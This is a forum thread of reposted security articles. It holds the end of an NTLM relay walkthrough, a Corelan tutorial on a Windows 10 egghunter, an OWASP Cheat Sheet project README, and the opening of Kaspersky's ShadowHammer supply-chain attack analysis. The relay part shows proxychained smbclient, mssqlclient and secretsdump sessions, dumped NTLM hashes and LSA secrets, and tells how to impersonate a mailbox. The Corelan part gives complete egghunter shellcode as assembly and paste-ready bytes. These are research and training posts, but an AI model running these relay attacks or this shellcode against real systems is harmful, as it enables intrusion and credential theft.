CONTOSO\normaluser1's password: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Dec 7 19:07:54 2017 .. DR 0 Thu Dec 7 19:07:54 2017 Default DHR 0 Tue Jul 14 03:08:44 2009 desktop.ini AHS 174 Tue Jul 14 00:59:33 2009 normaluser1 D 0 Wed Nov 29 14:14:50 2017 Public DR 0 Tue Jul 14 00:59:33 2009 5216767 blocks of size 4096. 609944 blocks available smb: \> A few important things here: You need to specify the right domain and username pair that matches the output of the socks command. Otherwise, the session will not be recognized. For example, if you didn’t specify the domain name on the smbclient parameter, you would get an output error in ntmlrelayx.py saying: [-] SOCKS: No session for WORKGROUP/NORMALUSER1@192.168.48.230(445) available When you’re asked for a password, just put whatever you want. As mentioned before, the SOCKS Relay Plugin that will handle the connection will fake the login process and then tunnel the original connection. Just in case, using the Administrator’s session will give us a different type of access: root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator ProxyChains-3.1 (http://proxychains.sf.net) WARNING: The "syslog" option is deprecated |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK Enter VULNERABLE\Administrator's password: Try "help" to get a list of possible commands. smb: \> dir $Recycle.Bin DHS 0 Thu Dec 7 19:08:00 2017 Documents and Settings DHS 0 Tue Jul 14 01:08:10 2009 pagefile.sys AHS 1073741824 Thu May 3 16:32:43 2018 PerfLogs D 0 Mon Jul 13 23:20:08 2009 Program Files DR 0 Fri Dec 1 17:16:28 2017 Program Files (x86) DR 0 Fri Dec 1 17:03:57 2017 ProgramData DH 0 Tue Feb 27 15:02:13 2018 Recovery DHS 0 Wed Sep 30 18:00:31 2015 System Volume Information DHS 0 Wed Jun 6 12:24:46 2018 tmp D 0 Sun Mar 25 09:49:15 2018 Users DR 0 Thu Dec 7 19:07:54 2017 Windows D 0 Tue Feb 27 16:25:59 2018 5216767 blocks of size 4096. 609996 blocks available smb: \> Now let’s play with MSSQL, we have the following active sessions: ntlmrelayx> socks Protocol Target Username Port -------- -------------- ------------------------ ---- MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 impacket comes with a tiny TDS client we can use for this connection: root@kalibeto:# proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:1433-<><>-OK [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed database context to 'master'. [*] INFO(WIN7-A\SQLEXPRESS): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (120 19136) [!] Press help for extra shell commands SQL> select @@servername -------------------------------------------------------------------------------------------------------------------------------- WIN7-A\SQLEXPRESS SQL> I’ve tested other TDS clients as well successfully. As always, the most important thing is to specify correctly the domain/username information. Another example that is very interesting to see in action is using IMAP/s sessions with Thunderbird’s native SOCKS proxy support. Based on this exercise, we have the following IMAP session active: Protocol Target Username Port -------- -------------- ------------------------ ---- IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143 We need to configure an account in Thunderbird for this user. A few things to have in mind when doing so: It is important to specify Authentication method ‘Normal Password’ since that’s the mechanism the IMAP/s SOCKS Relay Plugin currently supports. Keep in mind, as mentioned before, this will be a fake authentication. Under Server Setting->Advanced you need to set the ‘Maximum number of server connections to cache’ to 1. This is very important otherwise Thunderbird will try to open several connections in parallel. Finally, under the Network Setting you will need to point the SOCKS proxy to the host where ntlmrelayx.py is running, port 1080: Now we’re ready to use that account: You can even subscribe to other folders as well. If you combine IMAP/s sessions with SMTP ones, you can fully impersonate the user’s mailbox. Only constrain I’ve observed is that there’s no way to keep alive a SMTP session. It will last for a fixed period of time that is configured through a group policy (default is 10 minutes). Finally, just in case, for those boxes we have Administrative access on, we can just run secretsdump.py through proxychain and get the user’s hashes: root@kalibeto # proxychains ./secretsdump.py vulnerable/Administrator@192.168.48.230 ProxyChains-3.1 (http://proxychains.sf.net) Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: |S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef::: Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009::: HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb::: [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE::: Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO::: serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE::: normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE::: [*] Dumping LSA Secrets [*] $MACHINE.ACC VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38::: [*] DPAPI_SYSTEM 0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+...... 0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|.. 0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679 [*] NL$KM 0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u.... 0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK From this point on, you probably don’t need to use the relayed credentials anymore. Final Notes Hopefully this blog post gives some hints on what the SOCKS support in ntlmrealyx.py is all about. There are many things to test, and surely a lot of bugs to solve (there are known stability issues). But more important, there are still many protocols supporting NTLM that haven’t been fully explored! I’d love to get your feedback and as always, pull requests are welcomed. If you have questions or comments, feel free to reach out to me at @agsolino. Acknowledgments Dirk-Jan Mollema (@_dirkjan) for his awesome job initially in ntlmrelayx.py and then all the modules and plugins contributed over time. Martin Gallo (@MartinGalloAr) for peer reviewing this blog post. Sursa: https://www.secureauth.com/blog/playing-relayed-credentials
-
- 1
-
-
Windows 10 egghunter (wow64) and more Published April 23, 2019 | By Peter Van Eeckhoutte (corelanc0d3r) Introduction Ok, I have a confession to make, I have always been somewhat intrigued by egghunters. That doesn’t mean that I like to use (or abuse) an egghunter just because I fancy what it does. In fact, I believe it’s a good practise to try to avoid egghunters if you can, as they tend to slow things down. What I mean, is that I have been fascinated by techniques to search memory without making the process crash. It’s just a personal thing, it doesn’t matter too much. What really matters is that Corelan Team is back. Well, I’m back. This is my (technical) first post in nearly 3 years, and the first post since Corelan Team kind of “faded out” before that. (In fact, I’m curious to see if (some of) the original Corelan Team members would be able to find spare time again to join forces and to start doing / publishing some research. I certainly hope so but let’s see what happens.) As some of you already know, I have recently left my day job. (long story, too long for this post. Glad to share details over a drink). I have launched a new company called “Corelan Consulting” and I’m trying to make a living through exploit development training and CyberSecurity consulting. Trainings are going well, with 2019 almost completely filled up, and already planning classes in 2020. You can find the training schedules here. If you’re interested in setting up the Corelan Bootcamp or Corelan Advanced class in your company or at a conference – read the testimonials first and then contact me I still need to work on my sales skills in relation with locking in consulting gigs, but I’m sure things will work out fine in the end. (Yes, please contact me if you’d like me to work with you, I’m available for part-time governance/risk management & assessment work ;-)) Anyway, while building the 2019 edition of the Corelan Bootcamp, updating the materials for Windows 10, I realised that the wow64 egghunter for Windows 7, written by Lincoln, no longer works on Windows 10. In fact, I kind of expected it to fail, as we already knew that Microsoft keeps changing the syscall numbers with every major Windows release. And since the most commonly used version egghunter mechanism is based on the use of a system call, it’s clear that changing the number will break the egghunter. By the way : the system calls (and their numbers) are documented here: https://j00ru.vexillium.org/syscalls/nt/64/ (Thanks Mateusz “j00ru” Jurczyk). You can find the evolution of the “NtAccessCheckAndAuditAlarm” system call number in the table on the aforementioned website. Anyway, changing a system call number doesn’t really sound all too exciting or difficult, but it also became clear that the arguments & stack layout, the behavior of the system call in Windows 10, also differs from the Windows 7 version. We found some win10 egghunter PoCs flying around, but discovered that they did not work reliably in real exploits. Lincoln looked at it for a few moments, did some debugging andd produced a working version for Windows 10. So, that means we’re quite proud to be able to announce a working (wow64) egghunter for windows 10. The version below has been tested in real exploits and targets. wow64 egghunter for Windows 10 As explained, the challenge was to figure out where & how the new system call expects it’s arguments, how it changes registers & the stack to make sure that the arguments are always in the right place and provide the intended functionality: to test if a given page is accessible or not, and to do so without making the process die. This is what the updated routine looks like: "\x33\xD2" #XOR EDX,EDX "\x66\x81\xCA\xFF\x0F" #OR DX,0FFF "\x33\xDB" #XOR EBX,EBX "\x42" #INC EDX "\x52" #PUSH EDX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x53" #PUSH EBX "\x6A\x29" #PUSH 29 (system call 0x29) "\x58" #POP EAX "\xB3\xC0" #MOV BL,0C0 "\x64\xFF\x13" #CALL DWORD PTR FS:[EBX] (perform the system call) "\x83\xC4\x10" #ADD ESP,0x10 "\x5A" #POP EDX "\x3C\x05" #CMP AL,5 "\x74\xE3" #JE SHORT "\xB8\x77\x30\x30\x74" #MOV EAX,74303077 "\x8B\xFA" #MOV EDI,EDX "\xAF" #SCAS DWORD PTR ES:[EDI] "\x75\xDE" #JNZ SHORT "\xAF" #SCAS DWORD PTR ES:[EDI] "\x75\xDB" #JNZ SHORT "\xFF\xE7" #JMP EDI This egghunter works great on Windows 10, but it assumes you’re running inside the wow64 environment (32bit process on 64bit OS). Of course, as Lincoln has explained in his blogpost, you can simply add a check to determine the architecture and make the egghunter work on native 32bit OS as well. You can generate this egghunter with mona.py too – simply run !mona egg -wow64 -winver 10 When debugging this egghunter (or any wow64 egghunter that is using system calls), you’ll notice access violations during the execution of the system call. These access violations can be safely passed through and will be handled by the OS… but the debugger will break every time it sees an access violation. (In essence, the debugger will break as soon as the code attempts to test a page that is not readable. In other words, you’ll get an awful lot of access violations, requiring your manual intervention.) If you’re using Immunity Debugger, you can simply tell the debugger to ignore the access violations. To do so, click on ‘debugging options’, and open the ‘exceptions’ tab. Add the following hex values under “Add range”: 0xC0000005 – ACCESS VIOLATION 0x80000001 – STATUS_GUARD_PAGE_VIOLATION Of course, when you have finished debugging the egghunter, don’t forget to remove these 2 exception again Going forward For sure, MS is entitled to change whatever they want in their Operating System. I don’t think developers are supposed to issue system calls themselves, I believe they should be using the wrapper functions in ntdll.dll instead. In other words, it should be “safe” for MS to change system call numbers. I don’t know what is behind the the system call number increment with every Windows version, and I don’t know if the system call numbers are going to remain the same forever, as Windows 10 has been labeled as the “last Windows version”. From an egghunter perspective that would be great. As an increasingly larger group of people adopts Windows 10, the egghunter will have an increasingly larger success ratio as well. But in reality I don’t know if that is a valid assumption to make or not. In any case it made me think: Would there be a way to use a different technique to make an egghunter work, without the use of system calls? And if so, would that technique also work on older versions of Windows? And if we’re not using system calls, would it work on native x86 and wow64 environments right away? Let’s see. Exception Handling The original paper on egghunters (“Safely Searching Process Virtual Address Space”) written by skape (2004!) already introduced the the use of custom exception handlers to handle the access violation that will occur if you’re trying to read from a page that is not accessible. By making the handler point back into the egghunter, the egghunter would be able to move on. The original implementation, unfortunately, no longer seems to work. While doing some testing (many years ago, as well as just recently on Windows 10), it looks the OS doesn’t really allow you to make the exception handler to point directly to the stack (haven’t tried the heap, but I expect the same restriction to be in place). In other words, if the egghunter runs from the stack or heap, you wouldn’t be able to make the egghunter use itself as exception handler and move on. Before looking at a possible solution, let’s remind ourselves of how the exception handling mechanism works. When the OS sees an exception and decides to pass it to the corresponding thread in the process, it will instruct a function in ntdll.dll to launch the Exception Handling mechanism within that thread. This routine will check the TEB at offset 0 (accessible via FS:[0]) and will retrieve the address of the topmost record in the exception handling chain on the stack. Each record consists of 2 fields: struct EXCEPTION_REGISTRATION { EXCEPTION_REGISTRATION *nextrecord; // pointer to next record (nseh) DWORD handler; // pointer to handler function }; The topmost record contains the address of the routine that will be called first in order to check if the application can handle the exception or not. If that routine fails, the next record in the chain will be tried (either until one of the routines is able to handle the exception, or until the default handler will be used, sending the process to heaven). So, in other words, the routine in ntdll.dll will find the record, and will call the “handler” address (i.e. whatever is placed in the second field of the record). So, translating this into the egghunter world: If we want to maintain control over what happens when an exception occurs, we’ll have to create a custom “topmost” SEH record, making sure it is the topmost record at all times during the execution of the egghunter, and we’ll have to make the record handler point into a routine that allows our egghunter to continue running and move on with the next page. Again, if our “custom” record is the topmost record, we’ll be sure that it will be the first one to be used. Of course we should be careful and take the consequences and effects of running the exception handling mechanism into account: The exception handling mechanism will change the value of ESP. The functionality will create an “exception dispatcher stack” frame at the new ESP location, with a pointer to the originating SEH frame at ESP+8. We’ll have to “undo” this change to ESP to make sure we make it point back to the area on the stack where the egghunter is storing its data. Next, we should also avoid creating new records all the time. Instead, we should try to continue to use the same record over and over again, avoiding to push data to the stack all the time, avoiding that we’d run out of stack space. Additionally, of course, the egghunter needs to be able to run from any location in memory. Finally, whatever we put as “SE Handler” (second field of the record) has to be SAFESEH compatible. Unfortunately that is the weak spot of my “solution”. Additionally, my routine won’t work if SEHOP is active. (but that’s not active by default on client systems IIRC) Creating our own custom SEH record means that we’re going to be writing something to the stack, overwriting/damaging what is already there. So, if your egghunter/shellcode is also on the stack around that location, you may want to adjust ESP before running the egghunter. Just sayin’ This is what my SEH based egghunter looks like (ready to compile with nasm): ; Universal SEH based egg hunter (x86 and wow64) ; tested on Windows 7 & Windows 10 ; written by Peter Van Eeckhoutte (corelanc0d3r) ; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com ; ; warning: will damage stack around ESP ; ; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below ; [BITS 32] CALL $+4 ; getPC routine RET POP ECX ADD ECX,0x1d ; offset to "handle" routine ;set up SEH record XOR EBX,EBX PUSH ECX ; remember where our 'custom' SE Handler routine will be PUSH ECX ; p/p/r will fly over this one PUSH 0x90c3585c ; trigger p/p/r again :) PUSH 0x44444444 ; Replace with P/P/R address ** PLACEHOLDER ** PUSH 0x04EB5858 ; SHORT JUMP MOV DWORD [FS:EBX],ESP ; put our SEH record to top of chain JMP nextpage handle: ; our custom handle SUB ESP,0x14 ; undo changes to ESP XOR EBX,EBX MOV DWORD [FS:EBX],ESP ; make our SEH record topmost again MOV EDX, [ESP-4] ; pick up saved EDX INC EDX nextpage: OR DX, 0x0FFF INC EDX MOV [ESP-4], EDX ; remember where we are searching MOV EAX, 0x74303077 ; w00t MOV EDI, EDX SCASD JNZ nextpage+5 SCASD JNZ nextpage+5 JMP EDI Let’s look at the various components of the egg hunter. First, the hunter starts with a “GetPC” routine (designed to find it’s own absolute address in memory), followed by an instruction that adds 0x1d bytes to the address it was able to retrieve using that GetPC routine. After adding this offset, ECX will contain the absolute address where the actual “handler” routine will be in memory. (referenced by label “handle” in the code above). Keep in mind, the egghunter needs to be able to dynamically determine this location at runtime, because the egghunter will use the exception handler mechanism to come back to itself and continue running the egghunter. That means we’ll need to know (determine) where it is, store the reference on the stack, so we can “retrieve/jump” to it later during the exception handling mechanism. Next, the code is creating a new custom SEH record. Although a SEH record only takes 2 fields, the code is actually pushing 5 specially crafted values on the stack. Only the last 2 of them will become the SEH record, the other ones are used to allow the exception handler to restore ESP and continue execution of the egghunter. Let’s look at what gets pushed and why: PUSH ECX: this is the address where the “handle” routine is in memory, as determined by the GetPC routine earlier. The exception handler will need to eventually return to this one. PUSH ECX: we’re pushing the address again, but this one won’t be used. We’ll be using the pop/pop/ret pointer twice. The first time will be used for the exception handler to bring execution back to our code, the second time it will be used to return to the “ECX” stored on the stack. This second ECX is just there to compensate for the second POP in the p/p/r. You can push anything you like on the stack. PUSH 0x90c3585C: this code will get executed. It’s a POP ESP, POP EAX, RET. This will reset the stack back to the original location on the stack where we have stored the SEH record. The RET will transfer execution back to the p/p/r pointer on the stack (part of the SEH record). In other words, the p/p/r pointer will be used twice. The second time, it will eventually return to the address of ECX that was stored on the stack. (see previous PUSH ECX instructions) Next, the real SEH record is created, by pushing 2 more values to the stack: Pointer to P/P/R (must be a non-safeseh protected pointer). We have to use a p/p/r because we can’t make this handler field point directly into the stack (or heap). As we can’t just make the exception mechanism go back directly to our codewe’ll use the pop/pop/ret to maintain control over the execution flow. In the code above, you’ll have to replace the 0x44444444 value with the address of a non-SafeSEH protected pop/pop/ret. Then, when an exception occurs (i.e. when the egghunter reaches a page that is not accessible), the pop/pop/ret will get triggered execute for the first time, returning to the 4 bytes in the first field of the SEH record. In the first field of the SEH record, I have placed 2 pops and a short jump forward sequence. This will adjust the stack slightly, so the pointer to the SEH record ends up at the top of the stack. Next it will jump to the instruction sequence that was pushed onto the stack earlier on (0x90C3585C). As explained, that sequence will trigger the POP/POP/RET again, which will eventually return to the stored ECX pointer (which is where the egghunter is) To complete the creation of the SEH record and to mark it as the topmost record, we’re simply writing its location into the TEB. As our new custom SEH record currently sits at ESP, we can simply write the value of ESP into the TEB at offset 0 (MOV DWORD [FS:EBX],ESP). (That’s why we cleared EBX in the first place) At this point, the egghunter is ready to test if a page is readable. The code will use EDX as the reference where to read from. The routine starts by going to the end of the page (OR DX, 0x0FFF), then goes to the start of the next page (INC EDX), and then we store the value of EDX on the stack (at [ESP-4]), so the exception handler would be able to pick it up later on. If the read attempt (SCASD) fails, an access violation will be triggered. The access violation will use our custom SEH record (as it is supposed to be the topmost record), and that routine is designed to resume execution of the egghunter (by running the “handle” routine, which will eventually restore the EDX pointer from the stack and move on to the next page). The “handle” routine will: Adjust the stack again, correcting its position to put it where it is/should be when running the egghunter. (SUB ESP,0x14) Next it will make sure our custom record is the topmost SEH record again (just anticipating in case some other code would have added a new topmost record). Finally it will pick up a reference from the stack (where we stored the last address we’ve tried to access) and move on (with the next page). If a page is readable, the egghunter will check for the presence of the tag, twice. If the tags are found, the final “JMP EDI” will tell the CPU to run the code placed right after the double tag. When debugging the egghunter, you’ll notice that it’ll throw access violations (when the code tries to access a page that is not accessible). Of course, in this case, these access violations are absolutely normal, but you’ll still have to pass the exceptions back to the application (Shift F9). You can also configure Immunity Debugger to ignore (and pass) the exceptions automatically, but configuring the Exceptions. To do so, click on ‘debugging options’, and open the ‘exceptions’ tab. Add the following hex values under “Add range”: 0xC0000005 – ACCESS VIOLATION 0x80000001 – STATUS_GUARD_PAGE_VIOLATION Of course, when you have finished debugging the egghunter, don’t forget to remove these 2 exception again. In order to use the egghunter, you’ll need to convert the asm instructions into opcode first. To do so, you’ll need to install nasm. (I have used the Win32 installer from https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/) Save the asm code snippet above into a text file (for instance “c:\dev\win10_egghunter_seh.nasm”). Next, run “nasm” to convert it into a binary file that contains the opcode: "C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm Next, dump the contents of the binary file to a hex format that you can use in your scripts and exploits: python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj (You can find a copy of the bin2hex.py script in Corelan’s github repository) If all goes well, this is what you’ll get: "\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68\x44\x44\x44\x44" "\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7" Again, don’t forget to replace the \x44\x44\x44\x44 (end of third line) with the address of a pop/pop/ret (and to store the address in little endian, if you are editing the bytes ) Python friendly copy/paste code: egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83" "\xc1\x1d\x31\xdb\x51\x51\x68\x5c" "\x58\xc3\x90\x68") egghunter += "\x??\x??\x??\x??" #replace with pointer to pop/pop/ret. Use !mona seh egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23" "\xeb\x0d\x83\xec\x14\x31\xdb\x64" "\x89\x23\x8b\x54\x24\xfc\x42\x66" "\x81\xca\xff\x0f\x42\x89\x54\x24" "\xfc\xb8\x77\x30\x30\x74\x89\xd7" "\xaf\x75\xf1\xaf\x75\xee\xff\xe7") I have not added the routine to mona.py yet (but I will, eventually, at some point). Of course, if you see room for improvement, and/or able to reduce the size of the egghunter, please don’t hesitate to let me know. (I’ll be waiting for your feedback for a while before adding it to mona). Of course I’d love to hear if the egghunter works for you, and if it works across Windows versions and architectures (32bit systems, older Windows versions, etc). That’s all folks Thanks for reading! I hope you have enjoyed this brand new article and I hope you’re as excited about the future as much as I am. If you would like to hang out, discuss infosec topics, ask question (and answer questions), please sign up to our Slack workspace. To access the workspace: Head over to https://www.facebook.com/corelanconsulting (and like the page while you’re at it). You don’t need a facebook account, the page is public. Scroll through the posts and look for the one that contains the invite link to Slack Register, done. Also, feel free to follow us on Twitter (@corelanconsult) to stay informed about new articles and blog posts. Corelan Training & Corelan Consulting This article is just a small example of what you’ll learn in our Corelan Bootcamp. If you’d like to take one of our Corelan classes, check our schedules at https://www.corelan-training.com/index.php/training-schedules. If you prefer to set up a class at your company or conference, don’t hesitate to contact me via this form. As explained at the start of the article: the trainings and consulting gigs are now my main form of income. I am only able to do research and publish information for free if I can make a living as well. This website is supported, hosted and funded by Corelan Consulting. The more classes I can teach and the more consulting I can do, the more time I can invest in research and publication of tutorials. Thanks! © 2019, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2019/04/23/windows-10-egghunter/
-
- 1
-
-
Welcome to OWASP Cheat Sheet Series V2 This repository contains all the cheat sheets of the project and represent the V2 of the OWASP Cheat Sheet Series project. Table of Contents Cheat Sheets index Special thanks Editor & validation policy Conversion rules How to setup my contributor environment? How to contribute? Offline website Project leaders Core technical review team PR usage for core commiters Project logo Folders License Code of conduct Cheat Sheets index The following indexes are provided: This index reference all released cheat sheets sorted alphabetically. This index is automatically generated by this script. This index reference all released cheat sheets using the OWASP ASVS project as reading source. This index is manually managed in order to allow contribution along custom content. This index reference all released cheat sheets using the OWASP Proactive Controls project as reading source. This index is manually managed in order to allow contribution along custom content. You can also search into this repository using a keywords via this URL: https://github.com/OWASP/CheatSheetSeries/search?q=[KEYWORDS] Example: https://github.com/OWASP/CheatSheetSeries/search?q=csrf More information about the GitHub search feature can be found here. Project leaders Dominique Righetto. Jim Manico. Core technical review team Any GitHub member is free to add a comment on any Proposal (issue) or PR. However, we have created an official core technical review team (core commiters) in order to: Review all PR/Proposal in a consistent/regular way using GitHub's review feature. Extend the field of technologies known by the review team. Allow several technical opinions on a Proposal/PR, all exchanges are public because we use the GitHub comment feature. Decision of the core technical review team have the same weight than the projet leaders, so, if a reviewer reject a PR (rejection must be technically documented and explained) then project leaders will apply the global decision. Members: Elie Saad. Jakub Maćkowski. Dominique Righetto. Jim Manico. PR usage for core commiters For the following kind of modification, the PR system will be used by the core commiters in order to allow peer review using the GitHub PR review system: Adding of new cheat sheet. Deep modification of an existing cheat sheet. This the procedure: Clone the project. Move on the master branch: git checkout master Create a branch named feature_request_[ID] where [ID] is the number of the linked issue opened prior to the PR to follow the contribution process: git checkout -b feature_request_[ID] Switch on this new branch (normally it's the already the case): git checkout feature_request_[ID] Do the expected work. Push the new branch: git push origin feature_request_[ID] When the work is ready for the review, create a pull request by visiting this link: https://github.com/OWASP/CheatSheetSeries/pull/new/feature_request_[ID] Implements the modification requested by the reviewers and when the core technical review team is OK then the PR is merged. Once merged, delete the branch using this GitHub feature. See project current branches. Project logo Project's official logo files are hosted here. Folders cheatsheets_excluded: Contains the cheat sheets markdown files converted with PANDOC and for which a discussion must be made in order to decide if we include them into the V2 of the project due to the content has not been updated since a long time or is not relevant anymore. See this discussion. cheatsheets: Contains the final cheat sheets files. Any .md file present into this folder is considered released. assets: Contains the assets used by the cheat sheets (images, pdf, zip...). Naming convention is [CHEAT_CHEET_MARKDOWN_FILE_NAME]_[IDENTIFIER].[EXTENSION] Use PNG format for the images. scripts: Contains all the utility scripts used to operate the project (markdown linter audit, dead link identification...). templates: Contains templates used for different kinds of files (cheatsheet...). .github: Contains materials used to configure different behaviors of GitHub. .circleci / .travis.yml (file): Contains the definition of the integration jobs used to control the integrity and consistency of the whole project: TravisCI is used to perform compliance check actions at each Push/Pull Request. It must be/stay the fastest possible (currently inferior to 2 minutes) in order to provide a rapid compliance feedback about the Push/Pull Request. CircleCI is used to perform operations taking longer time like build, publish and deploy actions. Offline website Unfortunately, a PDF file generation is not possible because the content is cut in some cheat sheets like for example the abuse case one. However, to propose the possibility the consult, in a full offline mode, the collection of all cheat sheets, a script to generate a offline site using GitBook has been created. The script is here. book.json: Gitbook configuration file. Preface.md: Project preface description applied on the generated site. Automated build This link allow you to download a build (zip archive) of the offline website. Manual build Use the commands below to generate the site: # Your python version must be >= 3.5 $ python --version Python 3.5.3 # Dependencies: # sudo apt install -y nodejs # sudo npm install gitbook-cli -g $ cd scripts $ bash Generate_Site.sh Generate a offline portable website with all the cheat sheets... Step 1/5: Init work folder. Step 2/5: Generate the summary markdown page. Index updated. Summary markdown page generated. Step 3/5: Create the expected GitBook folder structure. Step 4/5: Generate the site. info: found 45 pages info: found 86 asset files info: >> generation finished with success in 14.2s ! Step 5/5: Cleanup. Generation finished to the folder: ../generated/site $ cd ../generated/site/ $ ls -l drwxr-xr-x 1 Feb 3 11:05 assets drwxr-xr-x 1 Feb 3 11:05 cheatsheets drwxr-xr-x 1 Feb 3 11:05 gitbook -rw-r--r-- 1 Feb 3 11:05 index.html -rw-r--r-- 1 Feb 3 11:05 search_index.json Conversion rules Use the markdown syntax described in this guide. Use this sheet for Superscript and Subscript characters. Use this sheet for Arrows (left, right, top, down) characters. Store all assets in the assets folder and use the following syntax:  for the insertion of an image. Use PNG format for the images (this software can be used to handle format conversion). [ALTERNATE_NAME](../assets/ASSET_NAME.EXT) for the insertion of other kinds of media (pdf, zip...). Use ATX style (# syntax) for section head. Use **bold** syntax for bold text. Use *italic* syntax for italic text. Use TAB for nested lists and not spaces. Use code fencing syntax along syntax highlighting for code snippet (prevent when possible horizontal scrollbar). If you use {{ or }} pattern in code fencing then add a space between the both curly braces (ex: { {) otherwise it break GitBook generation process. Same remark about the cheat sheet file name, only the following syntax is allowed: [a-zA-Z_]+. No HTML code is allowed, only markdown syntax is allowed! Use this site for generation of tables. Use a single new line between a section head and the beginning of its content. Editor & validation policy Visual Studio Code is used for the work on the markdown files. It is also used for the work on the scripts. The file Project.code-workspace is the workspace file in order to open the project in VSCode. The following plugin is used to validate the markdown content. The file .markdownlint.json define the central validation policy applied at VSCode (IDE) and TravisCI (CI) levels. Details about rules is here. The file .markdownlinkcheck.json define the configuration used to validate using this tool, at TravisCI level, all web and relatives links used in cheat sheets. How to setup my contributor environment? See here. How to contribute? See here. Special thanks A special thanks you to the following peoples for the help provided during the migration: ThunderSon: Deeply help about updating the OWASP wiki links for all the migrated cheat sheets. mackowski: Deeply help about updating the OWASP wiki links for all the migrated cheat sheets. License See here. Sursa: https://github.com/OWASP/CheatSheetSeries
-
Operation ShadowHammer: a high-profile supply chain attack By GReAT, AMR on April 23, 2019. 10:00 am In late March 2019, we briefly highlighted our research on ShadowHammer attacks, a sophisticated supply chain attack involving ASUS Live Update Utility, which was featured in a Kim Zetter article on Motherboard. The topic was also one of the research announcements made at the SAS conference, which took place in Singapore on April 9-10, 2019. Now it is time to share more details about the research with our readers. At the end of January 2019, Kaspersky Lab researchers discovered what appeared to be a new attack on a large manufacturer in Asia. Our researchers named it “Operation ShadowHammer”. Some of the executable files, which were downloaded from the official domain of a reputable and trusted large manufacturer, contained apparent malware features. Careful analysis confirmed that the binary had been tampered with by malicious attackers. It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature. We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”). The goal of the attack was to surgically target an unknown pool of users, who were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses into the trojanized samples and the list was used to identify the intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from more than 200 samples used in the attack. There might be other samples out there with different MAC addresses on their lists, though. Technical details The research started upon the discovery of a trojanized ASUS Live Updater file (setup.exe), which contained a digital signature of ASUSTeK Computer Inc. and had been backdoored using one of the two techniques explained below. In earlier variants of ASUS Live Updater (i.e. MD5:0f49621b06f2cdaac8850c6e9581a594), the attackers replaced the WinMain function in the binary with their own. This function copies a backdoor executable from the resource section using a hardcoded 